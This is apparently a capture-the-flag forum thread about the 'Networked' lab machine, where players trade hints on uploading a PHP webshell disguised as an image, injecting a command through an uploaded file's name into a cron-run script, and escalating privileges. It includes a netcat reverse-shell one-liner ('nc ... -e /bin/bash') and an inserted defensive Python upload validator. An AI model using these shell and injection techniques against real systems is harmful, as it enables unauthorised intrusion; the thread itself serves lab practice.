Networked

Rooted. Was overthinking the user part and then again the privesc. Stick to basics.

Rooted.

PM if you need help!

@PanamaEd117 said:

not getting php to execute the shell. got any articles I can reference?

What an image can do for you?

OK, I got into the low-privileged shell. Can't read from user.txt, what should I do? PM for any idea. Thanks.

I’m almost at the point where I’m going to throw my laptop out of the window. I’ve been stuck for days now.

I’m on the box as ae and trying to get a shell as g. I’ve read a lot about c*****d in and understand how it works, but just not in the context of the ck_a*k.php and cron files.

I don’t understand where I could inject the command… I’ve tried to create a file, upload a file with the command in the name, etc…

Help!! :frowning:

@casey said:

@PrimeSocK said:

@osmus said:

Not sure how to get escalation after I get my shell. I’ve read _.php but I’m not sure what I need to do with it. Any nudges would be appreciated.

So I’m able to touch the file and the nc connects but the listener closes immediately. Does anyone know why that happens?

I’m stuck here too. I know it’s something I’m missing but don’t know what to do.
Can someone help?

Edit: nvm…just use “” instead of just "
I don’t have user but now I have 2 apache shells, it’s something!

Edit your nc command with a /bin/bash. Ex:

nc (IP) (PORT) -e /bin/bash

Finally got user. But no idea how people are getting that command to work. Netcat kept dying immediately, so I had to try other shells.

Finally rooted. PM for nudges.

Rooted. Very rewarding box. Loved that this was all about digging through scripts and understanding what they do.

Here for help if anyone needs it.

@Digsy said:

Hmmm. Got to u*****.php but whatever I do I cannot sneak a shell onto the site. Anyone got an idea where I could be going wrong?

Try to see what filetypes are allowed to be uploaded

Was banging my head against the wall for two hours because the u*****.*** wasn’t loading whatsoever and it took me a hot minute to give up and come to the forums. Finally got it to load. I guess some of you guys went to bed LOL. Now here we go…

Got low priv shell. Struggling on user, could I get a hint? Also, do we actually get the user pw or just the flag?

Got root. Took a few hours yesterday because kept randomizing shell between a****e and user. I think I did the root part “wrong” since I did nothing “fancy”. Let's say that for the root, my days on WoW PvP proved more useful than days on programming.

Got root. Tbh getting user was far more fun than getting root. Anyway, if any of you is stuck at some point or wants me to guide you or provide some hints, feel free to ping me :slight_smile:

Got root. Learned a couple of new tricks on this box, thank you for that guly!

So I copied the code in ck_a*k.php and made a leafpad file on my computer to test it because I get an error. So the check found no errors, then when I run it it has an error. Don't know what to do about it.

PS: vim is just a name I gave it, it's the code from the above file.

root@FREAK2600:~/Desktop# php -l vim.php
No syntax errors detected in vim.php
root@FREAK2600:~/Desktop# python vim.php
  File "vim.php", line 1
    <?php
    ^
SyntaxError: invalid syntax

I have got a webshell now, however I don’t understand why my payload is executed, even though the extension is different. Can somebody tell me shortly?

Shout out to @MrXidus for the tip on getting root, was definitely a face palm moment as I spent days on it. But I did learn something which is why I’m here.

More than welcome to PM for help

@Cli3nt said:

I have got a webshell now, however I don’t understand why my payload is executed, even though the extension is different. Can somebody tell me shortly?

To detect a file’s filetype, one might rely either on the extension or on the file header.
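
The point in the reply above, as an added example that is not part of the original thread: an upload check that looks at only the extension or only the file header can be satisfied by a file that fails the other, so a defensive validator requires both to name the same allowed type. The function names, the allowlist and the sample inputs are constructed for illustration and are not taken from the box.

```python
import os

# Leading "magic" bytes for the image types this validator accepts.
SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXT_ALIASES = {"jpeg": "jpg"}


def type_from_extension(filename):
    """Return the allowed type named by the final extension, else None."""
    ext = os.path.splitext(os.path.basename(filename))[1].lstrip(".").lower()
    ext = EXT_ALIASES.get(ext, ext)
    return ext if ext in SIGNATURES else None


def type_from_header(data):
    """Return the allowed type whose signature starts the content, else None."""
    for kind, magics in SIGNATURES.items():
        if data.startswith(magics):
            return kind
    return None


def validate_upload(filename, data):
    """Accept only when both signals name the same allowed type."""
    by_ext = type_from_extension(filename)
    by_hdr = type_from_header(data)
    if by_ext is None:
        return (False, "extension not allowed")
    if by_hdr is None:
        return (False, "header not recognised")
    if by_ext != by_hdr:
        return (False, "extension and header disagree")
    return (True, by_ext)


# Constructed samples: (filename, first bytes of content).
PNG = b"\x89PNG\r\n\x1a\n"
SAMPLES = [
    ("photo.png", PNG + b"\x00\x00\x00\rIHDR"),
    ("notes.php", PNG + b"placeholder, not image data"),  # header-only check passes
    ("report.png", b"plain text, no image signature"),    # extension-only check passes
    ("avatar.jpeg", b"GIF89a" + b"\x01\x00\x01\x00"),     # both valid, but disagree
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(name, type_from_extension(name), type_from_header(data),
              validate_upload(name, data))
```

Agreement of both signals says nothing about the rest of the bytes, so a server should still store uploads under a name it generates and in a location where nothing is executed.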

I got the initial shell but I am trying to get the user priv but not able to do so. Please guide me somewhere. Any help is appreciated.

@kalagan76 said:

I’m almost at the point where I’m going to throw my laptop out of the window. I’ve been stuck for days now.

I’m on the box as ae and trying to get a shell as g. I’ve read a lot about c*****d in and understand how it works, but just not in the context of the ck_a*k.php and cron files.

I don’t understand where I could inject the command… I’ve tried to create a file, upload a file with the command in the name, etc…

Help!! :frowning:

same here bro :confused: